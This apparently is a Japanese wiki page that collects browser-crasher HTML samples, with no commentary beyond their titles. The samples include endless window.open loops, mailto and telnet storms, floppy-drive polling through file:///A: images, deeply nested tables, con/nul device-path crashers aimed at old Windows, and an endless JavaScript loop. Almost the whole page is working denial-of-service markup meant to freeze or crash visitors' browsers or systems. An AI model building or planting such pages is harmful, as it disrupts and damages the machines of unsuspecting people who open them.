アットウィキロゴ

トップページ

<html>
 <head><title>ウィンドウ無限表示型</title></head>
 <body onload="var i=0;while(true){open('./'.i++);}">
   <script type="text/javascript">
   <!--
     for(;;) {
       window.open();
     }
   //-->
   </script>
 </body>
</html>
<html>
 <head><title>mailtoストーム</title></head>
 <body>
   <img src="mailto:[email protected]">
   <img src="mailto:[email protected]">
     ・
     ・
     ・
   <img src="mailto:[email protected]">
 </body>
</html>
<html>
 <head><title>FDDアタック</title></head>
 <body>
   <img src="file:///A:/example.001">
   <img src="file:///A:/example.002">
     ・
     ・
     ・
   <img src="file:///A:/example.100">
 </body>
</html>
<html>
 <head><title>テーブルネスト</title></head>
 <body>
   <table border="1"><tr><td>
     <table border="1"><tr><td>
       <table border="1"><tr><td>
         <table border="1"><tr><td>
           <table border="1"><tr><td>
             <table border="1"><tr><td>
               <table border="1"><tr><td>
                 <table border="1"><tr><td>
                   <table border="1"><tr><td>
                     <table border="1"><tr><td>
                       <table><tr><td>Sample</td></tr></table>
                     </td></tr></table>
                   </td></tr></table>
                 </td></tr></table>
               </td></tr></table>
             </td></tr></table>
           </td></tr></table>
         </td></tr></table>
       </td></tr></table>
     </td></tr></table>
   </td></tr></table>
 </body>
</html>
<html>
 <head><title>conconクラッシャー</title></head>
 <body>
   <img src="file:///c:/con/con/con.con">
   <img src="file:///c:/nul/nul/nul.nul">
   <img src="file:///c:/lpt1/lpt2/lpt3.aux">
 </body>
</html>
<html>
 <head><title>telnet ストーム</title></head>
 <body>
   <iframe src="telnet://example.org:80"></iframe>
     ・
     ・
     ・
 </body>
</html>
<html>
 <head><title>JavaScript の永久ループ</title></head>
 <body>
   <script type="text/javascript">
   <!--
     for (var i = 0; ; i++);
   //-->
   </script>
 </body>
</html>
最終更新:2014年05月21日 21:22